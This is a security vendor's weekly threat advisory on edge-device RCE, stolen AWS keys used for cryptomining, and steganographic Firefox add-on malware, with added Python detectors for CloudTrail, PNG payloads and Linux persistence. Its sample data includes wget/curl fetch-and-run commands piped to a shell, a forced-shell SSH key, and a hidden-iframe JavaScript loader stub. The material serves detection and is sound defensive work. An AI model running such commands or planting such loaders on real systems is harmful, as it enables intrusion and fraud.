Edge-to-Cloud Threat Convergence: Perimeter RCE, Cloud Key Abuse, and Stego-Powered Browser Malware

SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations that help security teams take appropriate action to defend against the latest critical threats.

1. Gateways Under Fire: Edge & VPN RCE is the New Front Door

Attackers are zeroing in on internet-facing gateways for instant footholds and deep persistence, chaining device bugs into lateral movement and stealthy C2.

  • React2Shell (CVE-2025-55182) — Critical unauthenticated RCE in React Server Components, actively exploited to drop Linux implants (KSwapDoor, ZnDoor) and China-nexus payloads (MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, Noodle RAT). Observed post-exploitation pivots include reverse shells, MeshAgent deployment, SSH key abuse, and ShadowPad or XMRig drops.

  • WatchGuard Fireware IKEv2 (CVE-2025-14733) — Out-of-bounds write in the iked daemon enables unauthenticated RCE on any Firebox with an IKEv2 VPN configured. Exploitation has been observed; unexplained iked crashes or hangs and malformed or oversized CERT payloads in the IKE logs are the key tells.

2. Cloud Abuse at Scale: IAM Keys → Instant Crypto Mines

With stolen AWS IAM credentials, adversaries first map what the key is allowed to do using DryRun calls (a permitted action fails with DryRunOperation, a denied one with UnauthorizedOperation, so nothing is created yet), then auto-deploy ECS, EC2 or Lambda miners, raise autoscaling limits, and set disableApiTermination so the instances cannot be terminated through the API until the flag is cleared, slowing your response. The same access is often branched into SES-based phishing.
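The chain above leaves a distinctive CloudTrail trail, and the alerting recommended in this week's proactive steps (ECS cluster creation, extreme autoscaling, disableApiTermination changes) can be expressed as one sequence detector. The Python below is an added example, not SISA's tooling: it groups CloudTrail records by access key and reports keys that create compute shortly after a DryRun probe, scoring the extra stages. The record layout follows the CloudTrail schema; the access key IDs, instance IDs, names, timestamps and the WINDOW/AUTOSCALE_MAX thresholds are constructed for the example.

```python
"""Detect the stolen-key-to-miner chain in CloudTrail events.

Added example (not SISA's own tooling). Record fields follow the CloudTrail
schema; every value below (key IDs, instance IDs, times) is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(hours=2)   # a deploy this soon after a DryRun probe is suspicious
AUTOSCALE_MAX = 50            # maxSize at or above this counts as "extreme"
CREATE_COMPUTE = {
    ("ec2.amazonaws.com", "RunInstances"),
    ("ecs.amazonaws.com", "CreateCluster"),
    ("ecs.amazonaws.com", "RunTask"),
    ("ecs.amazonaws.com", "CreateService"),
    ("lambda.amazonaws.com", "CreateFunction20150331"),  # CloudTrail's name for CreateFunction
}
SES_ABUSE = {"SendEmail", "SendRawEmail", "VerifyEmailIdentity", "CreateEmailIdentity"}


def classify(ev):
    """Map one CloudTrail record to a stage of the chain, or None if unrelated."""
    src, name = ev["eventSource"], ev["eventName"]
    rp = ev.get("requestParameters") or {}
    # A DryRun call that "would have succeeded" tells the attacker the key may do this.
    if ev.get("errorCode") == "Client.DryRunOperation":
        return "dryrun_probe"
    if (src, name) in CREATE_COMPUTE:
        return "compute_creation"
    if src == "autoscaling.amazonaws.com" and name in (
            "CreateAutoScalingGroup", "UpdateAutoScalingGroup") \
            and int(rp.get("maxSize", 0)) >= AUTOSCALE_MAX:
        return "autoscale_spike"
    if (src, name) == ("ec2.amazonaws.com", "ModifyInstanceAttribute") \
            and (rp.get("disableApiTermination") or {}).get("value") is True:
        return "termination_protection"
    if src == "ses.amazonaws.com" and name in SES_ABUSE:
        return "ses_abuse"
    return None


def analyze(events):
    """Return {accessKeyId: finding} for keys that deploy compute within WINDOW of a DryRun probe.

    A finding lists the distinct stages seen and an ordered timeline; the score is the
    number of stages, so probe + deploy + autoscale + termination lock + SES scores 5.
    """
    by_key = defaultdict(list)
    for ev in events:
        by_key[(ev.get("userIdentity") or {}).get("accessKeyId", "<none>")].append(ev)
    findings = {}
    for key, evs in by_key.items():
        hits = []
        for ev in sorted(evs, key=lambda e: e["eventTime"]):
            stage = classify(ev)
            if stage:
                t = datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
                hits.append((t, stage, ev["eventName"]))
        probes = [t for t, s, _ in hits if s == "dryrun_probe"]
        deploys = [t for t, s, _ in hits if s == "compute_creation"]
        if not any(timedelta(0) <= d - p <= WINDOW for p in probes for d in deploys):
            continue
        stages = sorted({s for _, s, _ in hits})
        findings[key] = {
            "score": len(stages),
            "stages": stages,
            "timeline": [f"{t:%H:%M:%S} {name} [{s}]" for t, s, name in hits],
        }
    return findings


def _rec(time, src, name, key, **extra):
    """Build a minimal constructed CloudTrail record."""
    rec = {"eventTime": time, "eventSource": src, "eventName": name,
           "userIdentity": {"type": "IAMUser", "accessKeyId": key}}
    rec.update(extra)
    return rec


ATTACKER, ADMIN = "AKIAEXAMPLE0ATTACKER", "AKIAEXAMPLE0000ADMIN"  # constructed key IDs
SAMPLE_EVENTS = [
    _rec("2025-12-05T03:00:05Z", "sts.amazonaws.com", "GetCallerIdentity", ATTACKER),
    _rec("2025-12-05T03:00:09Z", "ec2.amazonaws.com", "RunInstances", ATTACKER,
         errorCode="Client.DryRunOperation",
         errorMessage="Request would have succeeded, but DryRun flag is set."),
    _rec("2025-12-05T03:02:41Z", "ecs.amazonaws.com", "CreateCluster", ATTACKER,
         requestParameters={"clusterName": "svc-cache"}),
    _rec("2025-12-05T03:03:10Z", "ec2.amazonaws.com", "RunInstances", ATTACKER,
         requestParameters={"instanceType": "c6i.8xlarge",
                            "instancesSet": {"items": [{"minCount": 20, "maxCount": 20}]}}),
    _rec("2025-12-05T03:04:00Z", "autoscaling.amazonaws.com", "UpdateAutoScalingGroup", ATTACKER,
         requestParameters={"autoScalingGroupName": "svc-cache-asg", "maxSize": 200}),
    _rec("2025-12-05T03:04:30Z", "ec2.amazonaws.com", "ModifyInstanceAttribute", ATTACKER,
         requestParameters={"instanceId": "i-0123456789abcdef0",
                            "disableApiTermination": {"value": True}}),
    _rec("2025-12-05T03:15:00Z", "ses.amazonaws.com", "SendEmail", ATTACKER),
    # Routine admin activity: no probe first, so it is not reported.
    _rec("2025-12-05T03:05:00Z", "ec2.amazonaws.com", "DescribeInstances", ADMIN),
    _rec("2025-12-05T03:06:00Z", "ec2.amazonaws.com", "RunInstances", ADMIN,
         requestParameters={"instanceType": "t3.micro"}),
]

if __name__ == "__main__":
    for key, f in analyze(SAMPLE_EVENTS).items():
        print(f"{key}: score {f['score']} stages={f['stages']}")
        print("\n".join("  " + line for line in f["timeline"]))
```

On a real export, load the `Records` array from the CloudTrail JSON files and pass it to `analyze`. The DryRunOperation error is the crux: a key that lacks the permission produces UnauthorizedOperation instead, so a probe followed within the window by real compute creation is the signal worth paging on, and the disableApiTermination and autoscaling stages raise the score rather than being required.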

3. Your Browser, Their Revenue Stream: Extension Steg & Ad Fraud

GhostPoster hid JavaScript inside the PNG logos shipped with 17 Firefox add-ons, delaying and randomizing activation to evade sandbox analysis. Once live, it rewrites affiliate links, injects tracking, strips Content-Security-Policy and X-Frame-Options response headers (which would otherwise block its framing of third-party pages), and drives ad and click fraud through hidden iframes under coordinated C2.
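Because the loader sat inside image assets rather than in a .js file, a static review of an add-on's PNGs catches this class of trick. The Python below is an added example, not GhostPoster's code or any vendor's scanner: it parses the PNG chunk structure, flags the hiding places a stego loader uses (bytes appended after IEND, text chunks, private chunk types, CRCs broken by post-hoc edits) and looks for script-like tokens in them. The sample images, the `ghSt` chunk type and the payload string are all constructed; the token list is an assumption tuned to extension loaders, not a complete detector.

```python
"""Scan a PNG shipped inside a browser add-on for hidden script payloads.

Added example (not the GhostPoster code or any vendor tool). It parses the PNG
chunk structure and flags where a loader can hide JavaScript: bytes appended
after IEND, text chunks (tEXt/zTXt/iTXt) and private chunk types. The sample
images and the payload string are constructed for this example.
"""
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
STANDARD_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tEXt", b"zTXt", b"iTXt",
                   b"gAMA", b"cHRM", b"sRGB", b"iCCP", b"pHYs", b"tRNS", b"bKGD",
                   b"tIME", b"sBIT", b"sPLT", b"hIST"}
# Tokens with no business in image metadata but common in extension loaders (assumption).
JS_TOKENS = re.compile(rb"eval\s*\(|Function\s*\(|atob\s*\(|document\.|browser\.|"
                       rb"chrome\.|fetch\s*\(|XMLHttpRequest|<script", re.I)


def _text_of(ctype, payload):
    """Return the textual body of a tEXt/zTXt/iTXt chunk, or None if not text or undecodable."""
    try:
        if ctype == b"tEXt":
            return payload.split(b"\0", 1)[1]
        if ctype == b"zTXt":
            rest = payload.split(b"\0", 1)[1]           # method byte, then deflate stream
            return zlib.decompress(rest[1:])
        if ctype == b"iTXt":
            rest = payload.split(b"\0", 1)[1]           # flag, method, lang\0, translated\0, text
            flag, body = rest[0], rest[2:].split(b"\0", 2)[2]
            return zlib.decompress(body) if flag == 1 else body
    except (IndexError, zlib.error):
        return None
    return None


def scan_png(data):
    """Walk the chunk list; return {'chunks': [...], 'alerts': [...]} (no alerts = clean)."""
    report = {"chunks": [], "alerts": []}
    if not data.startswith(PNG_SIG):
        report["alerts"].append("not a PNG: bad signature")
        return report
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(payload) < length or len(crc_bytes) < 4:
            report["alerts"].append(f"truncated {ctype!r} chunk")
            return report
        report["chunks"].append(ctype.decode("latin-1"))
        if struct.unpack(">I", crc_bytes)[0] != (zlib.crc32(ctype + payload) & 0xFFFFFFFF):
            report["alerts"].append(f"CRC mismatch in {ctype!r} (edited after encoding?)")
        text = _text_of(ctype, payload)
        if ctype not in STANDARD_CHUNKS:
            report["alerts"].append(f"non-standard chunk {ctype!r}, {length} bytes")
            text = payload                               # private chunk: inspect the raw body
        if text is not None and JS_TOKENS.search(text):
            report["alerts"].append(f"script-like text in {ctype!r}")
        pos += 12 + length
        if ctype == b"IEND":
            break
    trailing = data[pos:]
    if trailing:
        kind = "script-like" if JS_TOKENS.search(trailing) else "opaque"
        report["alerts"].append(f"{len(trailing)} {kind} bytes after IEND")
    return report


# ---- constructed samples -------------------------------------------------
def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_png(extra_chunks=(), trailing=b""):
    """A valid 1x1 RGB PNG; extra_chunks go before IEND, trailing bytes after it."""
    ihdr = _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    idat = _chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))  # filter byte + one RGB pixel
    return PNG_SIG + ihdr + idat + b"".join(extra_chunks) + _chunk(b"IEND", b"") + trailing


# Constructed loader stub; the base64 decodes to https://example.invalid
PAYLOAD = (b"(function(){var u=atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ=');"
           b"var f=document.createElement('iframe');f.style.display='none';"
           b"f.src=u;document.body.appendChild(f);})()")
CLEAN_PNG = build_png()
APPENDED_PNG = build_png(trailing=PAYLOAD)
ZTXT_PNG = build_png([_chunk(b"zTXt", b"Comment\0\0" + zlib.compress(PAYLOAD))])
PRIVATE_PNG = build_png([_chunk(b"ghSt", PAYLOAD)])   # 'ghSt' is a made-up private chunk type

if __name__ == "__main__":
    for name, png in [("clean", CLEAN_PNG), ("appended", APPENDED_PNG),
                      ("zTXt", ZTXT_PNG), ("private", PRIVATE_PNG)]:
        print(name, scan_png(png)["alerts"] or "clean")
```

Run it over every image in the unpacked .xpi: a logo with anything after IEND, or with script text in a comment chunk, deserves a closer look, and the CRC check catches images edited after encoding. It does not detect a payload hidden in pixel values (LSB stego); for that the IDAT stream would need decoding and entropy analysis.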

Proactive Steps for the Week

  • Patch & lock down edges: Update React2Shell-affected stacks and WatchGuard Fireware; until patched, restrict or disable IKEv2 and keep management interfaces off the public internet.

  • Hunt for persistence: Look for Linux daemons whose binaries live outside system paths (daemon masquerade), SOCKS5 proxies and port-forwards, newly added authorized_keys entries, root login enablement in sshd_config, and scripted wget→exec chains in shell history and cron.

  • Clamp cloud blast radius: Rotate or revoke long-lived AWS access keys, enforce MFA and least privilege, and alert on sudden ECS cluster creation, extreme autoscaling changes, and any change to disableApiTermination.

  • Protect secrets: Block container and host access to the cloud metadata service where possible (for example, require IMDSv2 and set the hop limit to 1 so containers cannot reach it); monitor for TruffleHog or Gitleaks runs and unexpected az/azd token minting.

  • Clean the browser edge: Remove the risky Firefox add-ons, enforce an extension allow-list, and monitor egress to the low-reputation domains tied to the campaign.
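The persistence hunt in the list above, as an added example in Python that is not part of the original advisory: it resolves sshd_config the way sshd does (first value wins), diffs authorized_keys against a baseline, flags wget/curl-to-exec chains in history or cron lines, and spots processes borrowing daemon names whose binary sits outside system paths. The sshd_config, key blobs, command history, IP addresses and process table are constructed samples; the DAEMON_NAMES and SYSTEM_BIN_DIRS lists are assumptions to tune per distribution.

```python
"""Linux persistence hunt for the indicators listed above.

Added example, not a SISA tool. Every input below is a constructed sample;
on a live host feed it /etc/ssh/sshd_config, ~/.ssh/authorized_keys, shell
history, crontabs and (pid, comm, readlink /proc/<pid>/exe) tuples.
"""
import re

SYSTEM_BIN_DIRS = ("/usr/sbin/", "/usr/bin/", "/usr/lib/", "/usr/libexec/", "/sbin/", "/bin/")
DAEMON_NAMES = {"sshd", "cron", "crond", "rsyslogd", "dbus-daemon", "systemd-udevd",
                "kswapd0", "kthreadd", "ksoftirqd"}   # names miners like to borrow (assumption)
KEY_RE = re.compile(r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+|sk-[\w.-]+@openssh\.com)"
                    r"\s+(\S+)(?:\s+(.*))?")
PIPE_TO_SHELL = re.compile(r"\b(?:wget|curl)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da|k)?sh\b")
FETCH_CHMOD_RUN = re.compile(r"\b(?:wget|curl)\b.*?(?:;|&&)\s*chmod\s+\S+.*?(?:;|&&)\s*(?:nohup\s+)?\.?/")


def effective_sshd_options(text):
    """sshd semantics: the first value given for a keyword wins; options inside a
    Match block apply only conditionally, so parsing stops there."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        opts.setdefault(key, parts[1].strip() if len(parts) > 1 else "")
    return opts


def sshd_alerts(text):
    opts = effective_sshd_options(text)
    alerts = []
    if opts.get("permitrootlogin", "prohibit-password").lower() == "yes":  # OpenSSH default shown
        alerts.append("PermitRootLogin yes")
    if opts.get("permitemptypasswords", "no").lower() == "yes":
        alerts.append("PermitEmptyPasswords yes")
    return alerts


def parse_authorized_keys(text):
    """Map key blob -> (type, comment, options prefix); options may precede the key type."""
    keys = {}
    for line in text.splitlines():
        m = KEY_RE.search(line)
        if m and not line.lstrip().startswith("#"):
            keys[m.group(2)] = (m.group(1), (m.group(3) or "").strip(), line[:m.start()].strip())
    return keys


def new_authorized_keys(baseline, current):
    base, cur = parse_authorized_keys(baseline), parse_authorized_keys(current)
    return [cur[blob] for blob in cur if blob not in base]


def download_exec_chains(commands):
    """Commands that fetch with wget/curl and pipe to a shell or chmod-then-run the file."""
    return [c for c in commands if PIPE_TO_SHELL.search(c) or FETCH_CHMOD_RUN.search(c)]


def masquerading_daemons(procs):
    """procs: (pid, comm, exe). Kernel threads have no exe, so a 'kswapd0' with one is
    already wrong; a real daemon's exe should sit under a system path and not be deleted."""
    return [(pid, comm, exe) for pid, comm, exe in procs
            if comm.strip("[]") in DAEMON_NAMES and exe
            and (not exe.startswith(SYSTEM_BIN_DIRS) or exe.endswith("(deleted)"))]


# ---- constructed samples -------------------------------------------------
SSHD_CONFIG = """# constructed sshd_config
PermitRootLogin yes
PasswordAuthentication yes
PermitRootLogin no          # ignored: the first value wins
Match User backup
    PermitRootLogin no
"""
BASELINE_KEYS = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBASELINEKEYBLOBxxxxxxxxxxxxxxxxxxxxxxx ops@jump\n"
CURRENT_KEYS = BASELINE_KEYS + 'command="/bin/sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCattackerBLOBxxxx\n'
COMMANDS = [
    "wget -q http://198.51.100.7/a.sh -O- | sh",
    "curl -fsSL https://203.0.113.9/x | bash -s -- -o",
    "cd /tmp && wget http://198.51.100.7/kswapd0 && chmod +x kswapd0 && nohup ./kswapd0 &",
    "wget https://releases.ubuntu.com/noble/SHA256SUMS",
    "curl -s https://api.internal/health | jq .status",
]
PROCS = [(812, "sshd", "/usr/sbin/sshd"), (42, "kswapd0", ""),
         (4711, "kswapd0", "/tmp/.x/kswapd0"), (4720, "cron", "/dev/shm/cron (deleted)")]

if __name__ == "__main__":
    print("sshd:", sshd_alerts(SSHD_CONFIG))
    print("new keys:", new_authorized_keys(BASELINE_KEYS, CURRENT_KEYS))
    print("download->exec:", download_exec_chains(COMMANDS))
    print("masquerade:", masquerading_daemons(PROCS))
```

The sshd parser matters more than it looks: an attacker who appends `PermitRootLogin yes` to the end of a config that already says `no` gains nothing, while one who prepends it wins, so a naive "grep for yes" gives both false positives and false negatives. The authorized_keys diff keeps the options prefix because a forced `command=` or a key added without a comment is itself a tell.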

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
